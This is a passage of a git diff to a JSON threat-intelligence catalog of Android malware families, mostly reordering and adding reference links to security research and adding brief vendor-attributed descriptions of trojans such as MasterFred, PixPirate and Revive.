"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf" ], "synonyms": [], "type": [] @@ -1840,6 +1891,24 @@ "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", "value": "KevDroid" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.knspy", + "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", + "https://blog.talosintelligence.com/2020/10/donot-firestarter.html", + "https://twitter.com/voodoodahl1/status/1267571622732578816", + "https://s.tencent.com/research/report/951.html", + "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/", + "https://community.riskiq.com/article/6f60db72" + ], + "synonyms": [], + "type": [] + }, + "uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b", + "value": "KnSpy" + }, { "description": "", "meta": { @@ -1871,9 +1940,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter", - "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf", "https://www.youtube.com/watch?v=nilzxS9rxEM", "https://twitter.com/malwrhunterteam/status/1337684036374945792", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf", "https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/" ], "synonyms": [], @@ -1900,13 +1969,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", - "https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", - "https://muha2xmad.github.io/mal-document/lokibotpdf/", - "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view", - "https://isc.sans.edu/diary/27282", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html", - "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/" + "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view", + "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://muha2xmad.github.io/mal-document/lokibotpdf/", + "https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/", + "https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf", + "https://isc.sans.edu/diary/27282" ], "synonyms": [], "type": [] @@ -1945,8 +2015,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", - "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html", + "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [ @@ -1958,7 +2028,7 @@ "value": "Marcher" }, { - "description": "", + "description": "According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers\u2019 goal is to steal credit card information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.masterfred", @@ -1977,8 +2047,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", - "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html", - "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/" + "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/", + "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html" ], "synonyms": [], "type": [] @@ -1991,8 +2061,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa", - "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html", "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html", + "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html", "https://twitter.com/ThreatFabric/status/1285144962695340032" ], "synonyms": [ @@ -2008,9 +2078,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter", + "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html", "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe", "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w", - "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html", "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12" ], "synonyms": [], @@ -2050,23 +2120,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao", - "https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends", - "https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html", - "https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484", - "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", - "https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/", - "https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/", - "https://www.xanhacks.xyz/p/moqhao-malware-analysis", - "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/", - "https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/", - "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1", - "https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", - "https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/", - "https://securelist.com/roaming-mantis-part-v/96250/", "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681", - "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf" + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", + "https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/", + "https://securelist.com/roaming-mantis-part-v/96250/", + "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/", + "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1", + "https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends", + "https://www.xanhacks.xyz/p/moqhao-malware-analysis", + "https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/", + "https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/", + "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf", + "https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/", + "https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/", + "https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484", + "https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", + "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html" ], "synonyms": [ "Shaoye", @@ -2122,8 +2192,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", - "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", + "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co", "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Android.OmniRAT" ], "synonyms": [], @@ -2166,12 +2236,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance", - "https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view", "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf", "https://securelist.com/it-threat-evolution-q2-2020/98230", "https://securelist.com/apt-phantomlance/96772/", - "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf", - "https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html" + "https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html", + "https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view" ], "synonyms": [ "PWNDROID1" @@ -2208,7 +2278,7 @@ "value": "PINEFLOWER" }, { - "description": "", + "description": "According to PCrisk, The PixPirate is a dangerous Android banking Trojan that has the capability to carry out ATS (Automatic Transfer System) attacks. This allows threat actors to automatically transfer funds through the Pix Instant Payment platform, which numerous Brazilian banks use.\r\n\r\nIn addition to launching ATS attacks, PixPirate can intercept and delete SMS messages, prevent the uninstallation process, and carry out malvertising attacks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixpirate", @@ -2241,9 +2311,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat", + "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ", "https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/", - "https://labs.k7computing.com/?p=22537", - "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ" + "https://labs.k7computing.com/?p=22537" ], "synonyms": [], "type": [] @@ -2403,12 +2473,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", - "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/", - "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html", + "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/", + "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", + "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html" + "https://www.govcert.admin.ch/blog/33/the-retefe-saga" ], "synonyms": [], "type": [] @@ -2417,7 +2487,7 @@ "value": "Retefe (Android)" }, { - "description": "", + "description": "According to PCrisk, Revive is the name of a banking Trojan targeting Android users (customers of a specific Spanish bank). It steals sensitive information. Cybercriminals use Revive to take ownership of online accounts using stolen login credentials. This malware abuses Accessibility Services to perform malicious activities.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.revive", @@ -2448,12 +2518,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", - "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", - "https://securelist.com/roaming-mantis-reaches-europe/105596/", + "https://securelist.com/roaming-mantis-part-v/96250/", "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/", "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/", - "https://securelist.com/roaming-mantis-part-v/96250/", - "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf" + "https://securelist.com/roaming-mantis-reaches-europe/105596/", + "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf", + "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/" ], "synonyms": [], "type": [] @@ -2506,13 +2576,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sharkbot", - "https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/", - "https://muha2xmad.github.io/malware-analysis/sharkbot/", - "https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/", - "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html", - "https://www.cleafy.com/cleafy-labs/sharkbot-a-new-generation-of-android-trojan-is-targeting-banks-in-europe", "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/", + "https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/", + "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf", + "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html", + "https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/", + "https://muha2xmad.github.io/malware-analysis/sharkbot/", "https://bin.re/blog/the-dgas-of-sharkbot/", + "https://www.cleafy.com/cleafy-labs/sharkbot-a-new-generation-of-android-trojan-is-targeting-banks-in-europe", "https://blog.fox-it.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" ], "synonyms": [], @@ -2522,11 +2593,12 @@ "value": "SharkBot" }, { - "description": "", + "description": "SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sidewinder", - "https://ti.qianxin.com/blog/articles/analysis-of-malware-android-software-spread-by-sidewinder-using-google-play/" + "https://ti.qianxin.com/blog/articles/analysis-of-malware-android-software-spread-by-sidewinder-using-google-play/", + "https://www.group-ib.com/blog/hunting-sidewinder/" ], "synonyms": [], "type": [] @@ -2565,8 +2637,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", - "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html", - "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html" + "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html", + "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html" ], "synonyms": [ "SlemBunk" @@ -2595,8 +2667,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsagent", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/", - "https://blog.alyac.co.kr/2128" + "https://blog.alyac.co.kr/2128", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/" ], "synonyms": [], "type": [] @@ -2621,12 +2693,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova", + "https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail", "https://muha2xmad.github.io/malware-analysis/sova/", - "https://blog.cyble.com/2023/03/09/nexus-the-latest-android-banking-trojan-with-sova-connections", "https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/", "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html", - "https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail", - "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly", + "https://blog.cyble.com/2023/03/09/nexus-the-latest-android-banking-trojan-with-sova-connections" ], "synonyms": [], "type": [] @@ -2666,10 +2738,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax", - "https://twitter.com/malwrhunterteam/status/1250412485808717826", "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html", - "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", - "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league" + "https://twitter.com/malwrhunterteam/status/1250412485808717826", + "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league", + "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset" ], "synonyms": [], "type": [] @@ -2682,18 +2755,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", - "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w", - "https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/", "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA", + "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w", + "https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions", + "https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/", "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/", + "https://labs.k7computing.com/index.php/spynote-targets-irctc-users/", "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html", - "https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/", - "https://labs.k7computing.com/index.php/spynote-an-android-snooper/", - "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan", - "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/" + "https://labs.k7computing.com/index.php/spynote-an-android-snooper/", + "https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions", + "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn", + "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan" ], "synonyms": [ "CypherRat" @@ -2735,8 +2811,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", - "https://securelist.com/mobile-malware-evolution-2019/96280/", - "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" + "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/", + "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] @@ -2873,16 +2949,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", - "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/", - "https://securelist.com/apkpure-android-app-store-infected/101845/", - "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", - "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/", + "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", + "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/", + "https://securelist.com/apkpure-android-app-store-infected/101845/", "https://securelist.com/mobile-malware-evolution-2019/96280/", - "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", - "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", - "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/" + "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", + "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", + "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/", + "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/" ], "synonyms": [], "type": [] @@ -2891,7 +2967,7 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout" @@ -2957,13 +3033,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005", - "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", - "https://s.tencent.com/research/report/951.html", - "https://community.riskiq.com/article/6f60db72", - "https://twitter.com/voodoodahl1/status/1267571622732578816", - "https://blog.talosintelligence.com/2020/10/donot-firestarter.html", - "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/" + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005" ], "synonyms": [], "type": [] @@ -2976,10 +3046,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006", - "https://twitter.com/ReBensk/status/1438027183490940931", + "https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749", "https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20", - "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/", - "https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749" + "https://twitter.com/ReBensk/status/1438027183490940931", + "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/" ], "synonyms": [], "type": [] @@ -3018,8 +3088,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vajraspy", - "https://twitter.com/malwrhunterteam/status/1481312752782258176", "https://mp.weixin.qq.com/s/B0ElRhbqLzs-wGQh79fTww", + "https://twitter.com/malwrhunterteam/status/1481312752782258176", "https://twitter.com/LukasStefanko/status/1509451238366236674" ], "synonyms": [], @@ -3076,10 +3146,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vultur", - "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud", "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html", - "https://www.threatfabric.com/blogs/vultur-v-for-vnc.html", - "https://twitter.com/_icebre4ker_/status/1485651238175846400" + "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud", + "https://twitter.com/_icebre4ker_/status/1485651238175846400", + "https://www.threatfabric.com/blogs/vultur-v-for-vnc.html" ], "synonyms": [ "Vulture" @@ -3094,8 +3164,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", - "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/", "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/", + "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/", "https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack", "https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/" ], @@ -3110,8 +3180,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wolf_rat", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] @@ -3133,13 +3203,26 @@ "uuid": "40a5d526-ef9f-4ddf-a326-6f33dceeeebc", "value": "Wroba" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wyrmspy", + "https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77f81373-bb3a-449d-82ff-b28fe31acef6", + "value": "WyrmSpy" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", - "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/", - "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", + "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/" ], "synonyms": [], "type": [] @@ -3152,12 +3235,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xenomorph", + "https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html", + "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html", + "https://www.zscaler.com/blogs/security-research/rise-banking-trojan-dropper-google-play-0", "https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html", "https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html", - "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html", - "https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html", - "https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5", - "https://www.zscaler.com/blogs/security-research/rise-banking-trojan-dropper-google-play-0" + "https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5" ], "synonyms": [], "type": [] @@ -3219,7 +3302,7 @@ "value": "YellYouth" }, { - "description": "", + "description": "According to cyware, Zanubis malware pretends to be a malicious PDF application. The threat actor uses it as a key to decrypt responses received from the C2 server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zanubis", @@ -3249,11 +3332,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", - "https://securelist.com/whos-who-in-the-zoo/85394/", "https://securelist.com/whos-who-in-the-zoo/85394", "https://www.secureworks.com/research/threat-profiles/cobalt-juno", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", - "https://securelist.com/apt-trends-report-q2-2019/91897/" + "https://securelist.com/whos-who-in-the-zoo/85394/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf" ], "synonyms": [], "type": [] @@ -3266,9 +3349,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", - "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", + "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", "https://securelist.com/ztorg-from-rooting-to-sms/78775/", - "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2" + "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1" ], "synonyms": [ "Qysly" @@ -3309,21 +3392,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", - "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", - 